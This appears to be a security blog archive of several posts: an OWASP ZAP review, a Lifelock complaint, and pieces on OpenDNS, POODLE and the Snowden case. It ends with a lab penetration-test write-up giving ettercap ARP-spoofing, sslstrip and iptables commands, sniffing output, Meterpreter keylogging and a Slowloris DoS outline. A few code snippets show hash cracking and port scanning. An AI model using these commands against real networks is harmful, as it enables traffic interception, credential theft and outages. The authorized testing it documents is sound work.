Category Archives: Hacking

Web Application Pen testing with OWASP ZAP (liking it)

Penetration testing is one of the methods used to validate the security posture of a network or application. While no pentest can discover everything, they are good at testing what you target and sometimes turn up what you didn't know existed. OWASP ZAP (Zed Attack Proxy) is one of the Java-based tools that you can fire up fast and get cracking with. This review isn't going to be technical in steps and methods, at least not too deep, but will reflect on the kind of functionality and purpose you are looking for in a tool.

OWASP ZAP can be used with its proxy settings enabled so you can view, review, edit, or modify traffic as it heads toward the target. It is great for testing local encryption and for SQL injection, XSS, and clickjacking attempts. With the proxy set up, you can test how input is sent, received, and accepted, and inspect the response the server gives. It is a great tool for troubleshooting and hardening applications, as well as for testing their performance. While using it I found a good YouTube video demonstrating many attacks that are possible on most database-backed web applications that people just pay no mind to. It is amazing how many subtle security flaws, leveraged in a chained attack, can lead to more and more information leakage that a cracker can grab and escalate with.
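The proxying described above can be exercised from code as well as from a browser. Here is a minimal, hedged Python sketch that assumes ZAP is listening on its default local address (localhost:8080); any traffic pushed through this opener shows up in ZAP's history for review and tampering. The target URL is just an illustrative, intentionally vulnerable demo site.

```python
import urllib.request

def zap_opener(proxy=""):
    """Build a urllib opener that routes HTTP and HTTPS traffic through a
    locally running ZAP instance (default listen address assumed here),
    so each request/response can be viewed and edited in the proxy."""
    handler = urllib.request.ProxyHandler({"http": proxy, "https": proxy})
    return urllib.request.build_opener(handler)

opener = zap_opener()
# With ZAP running, uncomment to push traffic through it:
# print(opener.open("http://testphp.vulnweb.com/").status)
```

From there, ZAP's breakpoints let you modify the request in flight before it reaches the target, which is exactly how the injection and clickjacking tests above are driven.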

Interesting videos
OWASP ZAP Tutorials

Security Testing for Developers Using OWASP ZAP

Lifelock Alerts – You’ve Been Hacked or A Social Site Was…Where’s the Proof Lifelock?

Recently an alert from Lifelock made me aware that my personal email account was somewhere on the black market. OK, I can see how that can happen when LinkedIn dropped the ball on security. It was attributed to the LinkedIn hack from back in 2012, and the spoils of that hacking resurfaced in May 2016.


In May 2016, LinkedIn had 164 million email addresses and passwords exposed. Originally hacked in 2012, the data remained out of sight until being offered for sale on a dark market site 4 years later. The passwords in the breach were stored as SHA1 hashes without salt, the vast majority of which were quickly cracked in the days following the release of the data.

Compromised data: Email addresses, Passwords
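The "quickly cracked" part follows directly from the unsalted SHA1 storage described above. A short Python sketch of the idea (the wordlist and leaked digest here are illustrative, not taken from the actual dump):

```python
import hashlib

def sha1_hex(password):
    """Unsalted SHA1: the same password always yields the same digest."""
    return hashlib.sha1(password.encode()).hexdigest()

# Because there is no salt, an attacker hashes a wordlist once and can
# look leaked digests up instantly -- for every user at the same time.
wordlist = ["letmein", "password", "linkedin2012"]
lookup = {sha1_hex(word): word for word in wordlist}

leaked_digest = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"
print(lookup.get(leaked_digest))  # recovers the plaintext "password"
```

A per-user random salt would force the attacker to redo the whole wordlist for every single account, which is why salted (and deliberately slow) schemes like bcrypt are the norm instead.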

The website haveibeenpwned has recorded the hacks and is a great source to use. The reason I point you to that site is a call to Lifelock that didn't go the way I wanted it to go. First off, I wanted to know which site out there has my information that they were able to scour and find. Lifelock operator: "I'm sorry sir, we don't have that information in the alert. I can only see what you see. I do know that they scan 10,000 sites for this information." Yes, OK, great, now please go get your supervisor. Supervisor: "Sir, yes it's true this happened, and we urge that you change your password and maybe even your email account altogether." OK Ms. Supervisor, but where did you get that information from? I work in security, and I work with ones and zeroes. Apparently, I can't get away from the zeroes. If the site exists, you must have a record somewhere of where my email address and old password are located. All Ms. Supervisor could do was re-state the obvious: they didn't have the information. How about your IT department, I said, can they help us out? Nothing.

Later on, trying to do something else, I hop over to the Netherlands and try to get some email, and wouldn't you know, a Google alert says "hey, someone tried logging in with your account." I'm like, yes, me. The next day Lifelock gets the same thing and an alert is sent to my cell. So this is how Lifelock works: piggybacking on Google to find out when someone attempted to use my account. Not impressing me.

Lifelock is basically selling cyber insurance and is not providing the details of where they found my information. This post is to challenge you to think about what exactly we are getting from a service that I can't get from news sources on the web about breaches. Where is the proof, Lifelock? That is my challenge to you. Don't call me up and tell me something is out there…we all know that.

While you're browsing the web, here is a nice recent article about identity-theft protection services not being what they're cracked up to be: Why Identity-Theft Protection Isn't All It's Cracked Up To Be (Kaveh Waddell)

An even better eyebrow raiser: Despite Promises, Lifelock Knows Public Data is A Risk. Guess I'm not the only one calling Lifelock out in the street.

Too Silo’d to React, Now Respond.

Ever think about what would happen if you got hacked? Maybe you are wondering if the IPS guys or the HIPS guys are really doing their jobs? In corporate America it is real easy to overlook a lot of precautions and security because you're just too leveraged. Today's threats keep evolving as bad actors continue to find ways inside. They utilize social sites and technology, the human frailty of needing to be needed, and work their way through with advanced IPS, IDS, and Anti-X evasion techniques. So what are you to do?

Looking at the problem from your cube, doing your work on your piece of the asset, your mind tends to think, "OK, this is what I have to do," and you move on to the next asset and service on that asset. That is all you can touch. Your ethical hacking group looks too busy (or not busy enough) to assist, and maybe they can or cannot really find all the holes in your security posture. How about a resident hacker, dedicated to that client or your span of control of clients, who can check security by reviewing the vulnerability reports made with hacking tools? The key difference here is not to pay for a once-a-year penetration test but to test regularly: red team vs. blue team, then provide results to management. Even just testing monthly to make sure patches and firewall rules are in place would be great. I think this would be one of the best security practices a company could get into.

RedSeal is a software solution that provides visibility into an organization's security by analyzing configurations and building out the network diagram. It can then import vulnerability reports and host information to really give you the what-if scenario that you have been thinking about in your cube. It will also give you a list of objectives to test, so you can confirm that the holes found are real and need fixing.

Security is not something you buy or do once in a while. It's a practice built on defined policies and procedures that are completed over and over again. If you think you are failing to practice the right procedures every day, or that your vigilance is intermittent, then I think you are a good candidate for Building Security Into Everyday Operations 101. Yes, a bit wordy, but think about it: it's not rocket science. The hurdles are time, the silo, and recognizing the concept.

In conclusion, the best security is a resident security expert allowed to do their job by providing tools and processes. If you cannot get a resident hacker or spend the time doing this yourself, allow me to make some suggestions. Get a requisition opened with HR to fill this role, or hire a service from a firm that understands vulnerability assessments and penetration testing. Allow them to practice regularly, providing results to you, and maybe you can stay out of the news. Security awareness and training also help prevent attacks, because users bring risk in from their computers. The biggest ways in are Adobe Flash and Reader, Java, and spear phishing.

If you have any questions or comments, or are looking for advice on services and where to go, feel free to contact me.

OpenDNS – Use It!

I cannot say it enough: wherever I go, and whenever I can, I advocate using OpenDNS. They screen web URLs before you reach them, so you are far less likely to hit a bad site. Defense in depth is addressed here as well; you need to watch your perimeter as well as the deep inside where your users reside. In fact, most hacking events today involve end users. What do they do all day? Work, and when they get a chance to blow off steam or check personal email, you open yourself up to risk. All those end users open your company up to attack via data leakage, IP losses, and corporate espionage. What's funny is that when companies buy other companies, they inherit the risk associated with their systems. Has anyone ever really thought about the risk inherited by hiring you, the employee? Maybe the board will start to re-think M&A and apply it to the microcosm of the workplace.

Recently SANS NewsBites ran an item about OpenDNS and detecting domain shadowing.

–Detecting Suspicious Domains
(March 5, 2015)
Technology being developed by OpenDNS aims to hasten detection of
malicious websites and domains. The technology, called Natural Language
Processing Rank (NLPRank), checks for suspicious site names. To reduce
the incidence of false positives, it also checks to see if the domain
is running on the same network that the organization it claims to be
from actually uses.
[Editor’s Note (Northcutt): OpenDNS is a really cool operation and if
you are not using it for your home network you should really consider
it; this goes double if you are a parent. And NLPRANK is an idea whose
time has come. The idea of registering domain names that are similar to
valid and trustworthy names e.g. is not new. What is
fairly new is the ability of attackers to prepare an attack, register
these slightly-off domains, embed them in tiny urls, phishing links in
emails, etc., and mop up the opportunities the people that succumb to
the attack present them in a very short period of time. In manufacturing
and quality control, people are very sensitive to cycle time. We need
to apply that type of mindset in defensive cybersecurity: ]

The article comments on the ability of NLPRank, a natural-language-processing rating system: for example, a domain name registered recently, with purposely misspelled naming and/or bad email registrant information, will receive a negative rank. Such a domain would be blocked for users of OpenDNS, or flagged with a warning that it's risky, much like WOT did with its color scheme for web search results. The system was still in testing at the time of this writing but should be usable in the near future. Hats off to OpenDNS for continuing to shock and wow the world, giving people and businesses an edge in thwarting cyber criminals.
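OpenDNS has not published NLPRank's internals, so treat this as an illustration only: the core "suspiciously close name" idea can be sketched with plain edit distance. The brand list and threshold below are made up for the example.

```python
def edit_distance(a, b):
    """Classic Levenshtein distance via dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,          # deletion
                           cur[j - 1] + 1,       # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]

def looks_shadowed(candidate, brands, max_dist=2):
    """Flag a domain label that sits suspiciously close to a known brand
    without being an exact match -- the typosquatting pattern NLPRank hunts."""
    return any(0 < edit_distance(candidate, b) <= max_dist for b in brands)

brands = ["paypal", "linkedin", "opendns"]
print(looks_shadowed("paypa1", brands))   # near-miss spelling
print(looks_shadowed("example", brands))  # unrelated name
```

The real system also weighs registration age, registrant details, and whether the domain resolves on the network the brand actually uses, which is what keeps the false-positive rate down.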

POODLE – What to do about it (CVE-2014-3566)

POODLE (CVE-2014-3566) is a vulnerability where negotiations between client and server result in a lower-security protocol being used (falling back from TLS 1.0 to SSLv3), in which an oracle-based side-channel attack can leak predictable padding and give an attacker performing a MITM the upper hand in obtaining ciphertext and session IDs and decrypting them. There is a possibility of hijacked sessions when users go off corporate security infrastructure to other sites. Some workarounds suggest downgrading from SSLv3 to SSLv2, but I would suggest the opposite direction: use TLS 1.1 or 1.2. Have users work from within the corporate network, go to safe sites, and DO NOT USE hotspots and open Wi-Fi connections for business-related activities. A lot of platforms, like Java, ASP.NET, Ruby on Rails, C++, Python, Perl, PHP, and ColdFusion, are targets for this padding side-channel attack. Even forcing 24×7 VPN connections, pushing all users through the corporate security infrastructure, would help protect corporate assets. End users should not use corporate computers for personal use until this is resolved. There are settings in browsers and on Windows computers to force TLS 1.0 or higher, found below.
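In code, the same "move up, not down" advice looks like this. A sketch using today's Python ssl module (which postdates the original advisory); the effect is that an SSLv3-only peer simply fails the handshake instead of negotiating down.

```python
import ssl

# Refuse anything below TLS 1.2 so a MITM cannot force the SSLv3 fallback
# that POODLE depends on. PROTOCOL_TLS_CLIENT also enables certificate
# verification by default, which we keep.
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.minimum_version = ssl.TLSVersion.TLSv1_2

print(context.minimum_version)
```

Wrap any client socket with this context and the downgrade dance is over before it starts; servers can set the same floor on their side.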

Check your browsers here

Browser Fixes
Mozilla Firefox

Type about:config into the address bar and hit Enter or Return. Click “I’ll be careful, I promise!” in the resulting warning window. Scroll down the list of preferences and double-click “security.tls.version.min”. Change the integer from 0 to 1 and click OK.

Google Chrome

For Google Chrome, you’ll have to temporarily become a power user and use a command line. The instructions are a bit different for Windows, Mac and Linux.

In Windows, first close any running version of Chrome. Find the desktop shortcut you normally click to launch Chrome and right-click it. Scroll down to and click Properties. Click the Shortcut tab. In the Target field, which should end with "\chrome.exe", add a space, then add this: "--ssl-version-min=tls1" (without quotation marks). Click Apply and then OK.

Microsoft Internet Explorer

Click the Tools icon in the top right corner (the icon looks like a gear). Scroll down and click Internet Options. In the resulting pop-up window, select the Advanced tab, then scroll through the list of settings until you reach the Security category. Uncheck Use SSL 3.0, click Apply, and then click OK.

Diving Deeper

Leaking information through padding that matches the underlying cryptography is, as Wikipedia notes, the norm; this is the case for ECB and CBC decryption used in block ciphers. Attackers could decrypt as well as encrypt messages under the server's keys without knowing the keys themselves. The issue is the predictable padding, and initialization vectors being implicit instead of explicit. While the fix for servers is to upgrade OpenSSL, I would move to something stronger and force clients to do the same. If we do not push for better security now, then when? Yes, there will be some pains in the transition, but I believe if we fend off the attackers at the perimeter and on the users inside, we will all be better off. Only around 18% of web servers use TLS 1.2, according to Qualys. Qualys further stated that moving up to TLS 1.1 or 1.2 doesn't mean the BEAST attack is thwarted, and that there could be another attack vector not yet known.
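The "predictable padding" point is easiest to see in code. Below is a toy sketch (not the full attack) contrasting the SSLv3 padding rule, which only pins down the final length byte, with the TLS rule that every padding byte must match:

```python
def sslv3_padding_ok(block):
    """SSLv3 CBC padding: only the last byte (the pad length) is defined;
    the padding bytes themselves can be anything. POODLE abuses exactly
    this slack, one byte at a time."""
    pad_len = block[-1]
    return pad_len < len(block)

def tls_padding_ok(block):
    """TLS CBC padding: pad_len copies of the pad-length value plus the
    length byte itself, all of which the receiver must verify."""
    pad_len = block[-1]
    if pad_len + 1 > len(block):
        return False
    return all(b == pad_len for b in block[-(pad_len + 1):])

# A tampered block whose padding bytes are garbage but whose final byte
# happens to be a plausible length:
tampered = bytes([0x41] * 12) + bytes([9, 7, 5, 3])
print(sslv3_padding_ok(tampered))  # accepted under SSLv3's loose rule
print(tls_padding_ok(tampered))    # rejected under TLS's strict rule
```

That asymmetry is why an attacker who can replay modified blocks against an SSLv3 endpoint learns one plaintext byte per roughly 256 tries, while a strict TLS check shuts the oracle down.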

Snowden Picking Info Off the NSA Network – What Went Wrong

As promised, I'm revisiting this article from Computerworld.

The story is just screaming some basic, fundamental, but glaring omissions in security practice. The CISSP study material addresses least-privilege roles and mandatory and discretionary controls by lesson 3, if not at the very beginning. Where is the payoff of the NSA hiring someone with a CISSP if the agency failed to demonstrate this practice? Why is it that we can see when people access certain shares and yet the big machine cannot?

The documents were kept in the portal so that NSA analysts and other officials could read and discuss them online, NSA CTO Lonny Anderson told National Public Radio in an interview Wednesday.

As a contracted NSA systems administrator with top-secret Sensitive Compartmented Information (SCI) clearance, Snowden could access the intranet site and move especially sensitive documents to a more secure location without raising red flags, Anderson said.

Thus, Snowden could steal the NSA Power Point slides, secret court orders and classified agency reports that he leaked to the media. “The assignment was the perfect cover for someone who wanted to leak documents,” Anderson told NPR.

“His job was to do what he did. He wasn’t a ghost. He wasn’t that clever. He did his job,” Anderson said.

That above-mentioned quote should get a knee slap at happy hour for being duped by Snowden. While he wasn't "clever" enough, Mr. Anderson, to hack in and get the loot, he was clever enough to do it and leave before you stopped him. He went right in the front door and did it right under your nose. You'd be wise to allow only the people with a need to know to perform the technical work, with the same controls mentioned below on tagging, which is akin to enabling an audit trail.

The NSA has also started "tagging" sensitive data and documents to ensure that only people with a need to see a document can access it. The document tagging rule also lets security auditors see how individuals with legitimate access to the data are actually using it, Anderson said.

This leads the general public to believe that they are using some Windows file share and not a content delivery system with an audit trail designed in from the start. It brings me back to my pharmaceutical days, where a vendor, Agilent, made a document system in which one could view research and look things up based on metadata. The NSA could learn a lesson here.
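The tagging-plus-audit idea can be sketched in a few lines. Everything here (names, tags, the API) is hypothetical, purely to show how need-to-know checks and an audit trail fall out of the same design:

```python
from datetime import datetime, timezone

class TaggedStore:
    """Toy sketch of 'tagged' documents with a built-in audit trail:
    every read attempt is recorded, and a read succeeds only when the
    reader holds every tag on the document (need-to-know)."""

    def __init__(self):
        self.docs = {}
        self.audit = []  # (timestamp, user, doc, granted)

    def add(self, name, body, tags):
        self.docs[name] = (body, set(tags))

    def read(self, name, user, user_tags):
        body, tags = self.docs[name]
        granted = tags <= set(user_tags)  # reader must hold every tag
        self.audit.append((datetime.now(timezone.utc), user, name, granted))
        return body if granted else None

store = TaggedStore()
store.add("ops-report", "body text", ["SIGINT"])
store.read("ops-report", "sysadmin", ["ADMIN"])            # denied, but logged
store.read("ops-report", "analyst", ["SIGINT", "ADMIN"])   # granted, and logged
```

The point is that denials get logged too; a sysadmin repeatedly probing documents outside his tags would light up in the audit trail long before anything left the building.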

The following excerpt from the article, a response from Eric Chiu, is one I disagree with. While role-based security is nice for the group, let's look at the individual. As stated by Mr. Chiu:

“Companies need to shift their thinking from an outside-in model of security to an inside out approach,” said Eric Chiu, founder of Hytrust, a cloud infrastructure management company.

“Only by implementing strong access controls [like] the recent NSA ‘two-man’ rule as well as role-based monitoring, can you secure critical systems and data against these threats and prevent breaches as well as data center failures,” he said.

Where is the detailed log of the individual user? Under discretionary access control the user can make policy decisions, contrary to mandatory access control. From Wikipedia, for quick reference:

With mandatory access control, this security policy is centrally controlled by a security policy administrator; users do not have the ability to override the policy and, for example, grant access to files that would otherwise be restricted. By contrast, discretionary access control (DAC), which also governs the ability of subjects to access objects, allows users the ability to make policy decisions and/or assign security attributes. (The traditional Unix system of users, groups, and read-write-execute permissions is an example of DAC.) MAC-enabled systems allow policy administrators to implement organization-wide security policies. Unlike with DAC, users cannot override or modify this policy, either accidentally or intentionally. This allows security administrators to define a central policy that is guaranteed (in principle) to be enforced for all users.

I believe the correct solution would be a lattice-based access control implementation, where a user can only access data if their security designation dominates the target's, AND there is user-level logging while in the system.

Now, taking this story down the rabbit hole: what makes you think that glasses-wearing Snowden didn't go in, read the documentation, and record it with super spy glasses? How about a cell phone camera? How about a phone call with him reading the information verbatim right off the screen? These are also fundamental physical breaches that may or may not have been considered, since they can be done in plain sight. Why was he accessing so many files? Why wasn't the six-month security access check picking up on his behavior? Why isn't the NSA watching their own people more closely than they are watching us? How come Israeli screeners can detect malicious people in airports by watching and interviewing them, with no mechanical screening, the old-fashioned way?

Penetration Testing with Linux – Featuring Kali and Armitage

Netwerk Guardian LLC brings you this article showing what can be done in penetration testing with Kali or Backtrack and Armitage. This is a technical subset of my thesis on Effective Penetration Testing. So without further delay…

Penetration testing with Linux is one of the best ways to perform tests. It is a versatile tool. Linux comes in many flavors, like Backtrack5 RC3 or now Kali, and allows for the customization of the software itself plus the tools that you use; therefore, the customization and level of sophistication are limitless. This article will cover using Backtrack5 RC3 and Armitage for the test as it was executed during the pen test, and may not cover all features of Armitage. However, in order to give you a better understanding of Armitage, Kali will be used as well in different screenshots. Note that Armitage is no longer supported under Backtrack with the release of Kali in early 2013. We chose to use Kali in this article to show you something recent, but the other versions of Linux are still very good tools to use in the field.

Backtrack comes loaded with Metasploit, and as you know, in order to find and run an exploit you have to switch to its directory and run the commands specific to it. This is no longer the case with Kali: following the FHS (Filesystem Hierarchy Standard), Kali makes all commands accessible system-wide from the command line. Armitage provides a nice GUI to Metasploit. It also has a dashboard you can use for setting up the hosts or network you are going to target. You can import hosts from files produced by other network security assessment tools like Nessus, IP360, and Burp session XML; Armitage imports anything from a text or XML file.

You can use some of the automation presented with Armitage. In addition, it is wise to customize these scripts when delivering a penetration test; you never really know what the outcome may be unless you test in a lab first. The great thing about Armitage is that it has a database of known vulnerabilities and attacks from which you can draw in your test. This helps save time and keeps you focused, but not all exploits work, as targets can be hardened. Customizing scripts and Linux itself has long been the core of these releases. Armitage can be used as a standalone tool as well as a networked solution when working with other pen testers. There are a few reporting options that can be used with Backtrack or Kali to save your work and share results or progress. Armitage has its own place to store evidence in data format, called loot, but not in an all-inclusive report format.

Armitage is launched by navigating to the Applications menu and following Kali Linux > Exploitation Tools > Network Exploitation > Armitage (Image 1). In a new installation of Kali, you will have to manually enter the following commands in order for Armitage to connect to the database:

service postgresql start
service metasploit start

Once these are entered, you can start Armitage successfully using the default user name msf and password test.
Image 1

Next there are a series of prompts that direct you through launching and customizing port usage. Once Armitage is open, we can begin using it to scan for hosts or network subnets. Just launch nmap (Image 2) from within Armitage and choose to add a host or scan a network with one of several scripted choices. The rules are the same for using nmap within Armitage as by itself: there are aggressive scans and quieter scans, so choose wisely in order to remain quiet. The two machines we want to target are a server hosting the core business application and a typical user workstation. See Image 3 below, from the pen test previously run with Armitage on Backtrack5 RC3.

Image 2 (Launching nmap within Armitage)

The next step you want is the find-vulnerabilities scan. Armitage scans the hosts and comes up with a proposed list of attacks. Not each and every attack is going to work; it names a type of technology to exploit, and this, coupled with your experience and training, helps you judge whether it is likely to succeed. This is where the pen tester needs to be on their best game to find an exploit with which to launch a payload. What is good about Armitage is that each exploit or payload you try opens a new tab, so you can see what works and doesn't and where to go next.

Now that we have our hosts found, targeted, and with an attack list, we can proceed. Since the machines were Windows based, we quickly went to the relevant exploits to see if there was a way to pwn the boxes. In Armitage you can assign to each host the account that is used to log in and run the payloads. We tried many exploits but found that only one really works; it will be addressed later. Below, in Image 3, you can see that when a system username and password are known and Login > psexec is used, lightning is drawn all around the host.

Image 3 (Note the lightning around Hosts = pwned)

In the pen test shown here, the machines' administrator accounts were known, in a white-box test, to see if we could sniff traffic from the core business application. The objective is to imitate an insider threat, or to demonstrate something beyond passing the hash for Windows users on the network.

The following shows what we want to test. It is taken from a lab setup of a typical company using an earth materials management system. The network is made up of Microsoft Windows machines, with Windows 7 for end users and Windows Server 2008 R2 on the server. The objective is to look for vulnerabilities on the host machines to see if we can capture data going across the network to the server, as in corporate espionage.
1. Test Core Business Application
a. Test core business application against
i. Clear text traffic capturing
ii. Man in the middle (MITM)
iii. Spoofing
iv. Armitage w/Meterpreter
v. DoS Slowloris

Port Scanning Results and Issues
Scanning Windows machines

The first test was scanning of services and ports on the Microsoft devices, covering port scanning by Nessus as well as the Microsoft Baseline Security Analyzer. The scans discovered the default Windows system ports open for unsigned SMB, telnet, and high ports. The results from Nessus showed an unsigned SMB/Samba port (445) as well as the open clear-text telnet channel (23). Nessus found only one medium and one low alert for the server. Port 135 on the workstation was found open; it is used for remote procedure calls. Port 139 was found open; it is used with SMB for file sharing with devices besides Microsoft's. Port 808 is the StreetSmarts web-based application, running encrypted. Port 992 was found to be an SSL port with a certificate error. Additional ports were found open in the range 49152-49157, due to a change by Microsoft in January 2008 that starts the dynamic port range at 49152. Some P2P (peer-to-peer) file sharing has been known to run over these ports.
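For readers who want to see what a port scan boils down to, here is a minimal TCP connect() sketch in Python. nmap and Nessus do far more (SYN scans, version probes, script checks), and the port list in the comment simply mirrors the ones discussed above.

```python
import socket

def tcp_connect_scan(host, ports, timeout=0.5):
    """A minimal TCP connect() scan -- the noisy end of what nmap does.
    Returns the subset of ports that accepted a full three-way handshake."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means connected
                open_ports.append(port)
    return open_ports

# Scan only hosts you own or are authorized to test, e.g.:
# print(tcp_connect_scan("", [23, 135, 139, 445, 808, 992]))
```

Because every probe completes a real handshake, this style of scan shows up plainly in target logs, which is exactly why quieter SYN scans exist.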
A possible attack that was not conducted in this test was escalation of privileges via the SMB vulnerability and brute-forcing usernames and passwords. An attacker also could have social-engineered the information from an unsuspecting user.

Armitage has the option to ask it what vulnerabilities and attacks could be possible on a chosen target. Just select the host and then go to the menu Attacks > Find Attacks. It will return a list of possible attacks and say "Happy Hunting!" Therefore, that is exactly what happened.

The following tools were used to test a vulnerability of unencrypted communication on the LAN (Local Area Network) with ettercap always being used for the MITM. They are SSLstrip, Dsniff, Driftnet, Urlsnarf, and meterpreter.

Technical Overview – Sniffing MITM Attacks
Using Ettercap, we copied traffic between the user and the gateway to our pen-testing laptop. Alongside Ettercap we used sslstrip, urlsnarf, dsniff, and Driftnet, with the commands entered below. In Ettercap we scanned the subnet and added target 1 = the gateway and target 2 = the victim machine. Here we were able to get a copy of everything sent by the user to the laptop (attacker) first, before it went on to the real gateway. This is done with sslstrip, iptables, and ettercap performing a MITM ARP-spoofing attack. In a test where you are trying to avoid detection, it is very important to ensure your laptop can handle the traffic, and you must be ready to execute the sequence of commands in order to avoid seeing packets destined to the same IP address twice.

Each attack and tool used has its benefits and limitations. The idea was to see data going across that could be used for corporate espionage and sold to a competitor. The tools were researched and chosen for this pen test to see what would really come across the wire. The following is a brief overview of each tool.

SSLstrip – A tool that prevents a connection from upgrading to an SSL session in an unnoticeable way. The history behind it is that one could also forge a certificate, appearing signed and trusted, so an https session looked legitimate while the intended server actually ended up being the attacker (Wikipedia).

Dsniff – A tool used to sniff anything of interest, like email or passwords. arpspoof has to be running, of course, so that the traffic is routed through the attacker's PC and back out to the real router and PC (Wikipedia).

Driftnet – This tool allows you to see what images are going across the user’s browser while surfing the web. In this test users were not on the internet but were using a browser to launch an application which we wanted to see.

Urlsnarf – A tool that places all visited url output to file for easy reviewing. Not a tool that provides much advantage in this pen test.

Meterpreter – This tool can be used to take advantage of many vulnerabilities in different platforms in order to gain root access or control of a PC.

Script Execution
In the following presentation of code, we see that numerous attempts utilizing ettercap and ARP spoofing were made to send traffic to the attacker. Each tool was run alongside ettercap to see what information would actually pass to the attacker. The most exciting tools were Driftnet and Meterpreter, because of what could be seen and the control gained.

ettercap --mitm ARP:REMOTE --text --quiet --write /root/sslstrip/ettercap.log --iface eth0
The GUI was also used to pick target 1, the Windows 7 client machine, and target 2, the application server.

Execute the following commands
In the CLI we entered:
root@bt:/# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:/# cat /proc/sys/net/ipv4/ip_forward
root@bt:# sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
Now verify it took the filter
root@bt:~# iptables -L -t nat
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
REDIRECT tcp -- anywhere anywhere tcp dpt:www redir ports 10000

Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
root@bt:# sudo python sslstrip.py -l 10000 -f

Results sslstrip: No data or text of any sort was visible, since all data was being passed through an encrypted channel.

Results with dsniff: Web addresses were visible, but no usernames or passwords. These results show that the application is very secure.

Results with driftnet: There were no pictures or images of the site going across. There were web addresses being listed.

Results with urlsnarf: The only thing that came through here was some local address space and some internet address space redacted for publication. Still there were no real gems of information for quick gains.

Technical Output
root@bt:~# urlsnarf -n -i eth0
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]
– – [15/Jan/2013:23:10:12 -0500] “GET HTTP/1.1” – – “-” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)”
– – [15/Jan/2013:23:10:13 -0500] “GET
– – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)”
– – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)”
– – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)”
– – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)”
– – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)”

Executed commands (example):
root@bt:/# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:/# cat /proc/sys/net/ipv4/ip_forward
1

In another terminal, we ran driftnet:
root@bt:/# driftnet -i eth0
root@bt:/# driftnet -i eth0 -v -s (the -s switch also attempts to capture streamed audio)
We could then see what the user was looking at for images.

Results: Images from the core business application were not captured by our laptop, despite driftnet running.
root@bt:~# driftnet -i eth0 -v
driftnet: using temporary file directory /tmp/driftnet-AmaowM
driftnet: listening on eth0 in promiscuous mode
driftnet: using filter expression `tcp'
driftnet: started display child, pid 2562
driftnet: link-level header length is 14 bytes
.driftnet: new connection: ->
…driftnet: new connection: ->
…driftnet: new connection: ->
…driftnet: new connection: ->

Meterpreter – Meterpreter, used together with Armitage, was the tool for this test. Even with a connection established, it was impossible to glean any data from the encrypted application or provide a way to leak it out. Knowing the administrator password made the connection possible; even a regular user with a known password would be able to dump the password hashes and crack them later in an attempt to escalate privileges. Time is the deciding factor in how successful the cracker would be, by going slow with the password cracking.
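The "crack passwords later" step is an offline dictionary attack against the dumped hashes. A sketch of the idea against a single unsalted SHA1 hash (the hash type and wordlist here are illustrative; real Windows hash dumps are NTLM and would be fed to a dedicated cracker such as John the Ripper or hashcat):

```python
import hashlib

def crack_sha1(target_hash, wordlist):
    """Offline dictionary attack on one unsalted SHA1 hash. With no
    salt, each candidate costs a single hash operation, which is why
    unsalted dumps fall so quickly given time and a good wordlist."""
    for candidate in wordlist:
        if hashlib.sha1(candidate.encode()).hexdigest() == target_hash:
            return candidate
    return None

words = ["letmein", "Summer2013", "password"]
target = hashlib.sha1(b"password").hexdigest()
print(crack_sha1(target, words))  # → password
```

This is exactly why time is the factor: the attacker can grind through candidate passwords at leisure, far from the target network.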

Results: We were able to log keystrokes and take screenshots of the user's computer, so this is one way data could be captured. In this test we show that key logging and screen captures are possible; however, they are not very effective, as shown below in Image 7. Anything operating at the application layer of the OSI model remained visible and the tool worked; once traffic was encrypted at the network level, it was impossible to see.

Image 4 – Armitage Text Output of Key logging


Image 5 – Email Credentials Entered

Image 6 – Screenshot Before Launching Encrypted Application


Image 7 – After Launching Encrypted Application

We have seen before that the desktop can be captured with screenshots and information leaked that way. Notice in the image below, however, that the application icon is present as a big ‘S’ in the toolbar, and on the workstation the application is running in the foreground. Yet the captured image does not show it: the application is effectively invisible to the reverse TCP shell. That ‘S’ represents the business’s core application. The launch HTML page, served on port 80, is the only visible part of the application. This demonstrates that the application running on the computer was able to encrypt all activity for queries, results, and navigation.

DoS – Slowloris Python Script

Now we get to some fun. Besides trying to sniff traffic and look at client proprietary data, we can also try to make their systems unavailable to them. Remember that an unavailable system means lost income, or at least a serious impact that makes generating income and staying operational difficult. The script we will use is a Perl script called slowloris (there is an IPv6 version as well). This script is unique in that it does not try to hammer the web server with a full load of requests right away; instead, the requests come in waves. The script has settings for the number of connections and the frequency of those connections, and these two fields were used against the server. The server was a Windows Server 2008 R2 (fresh install, no updates).

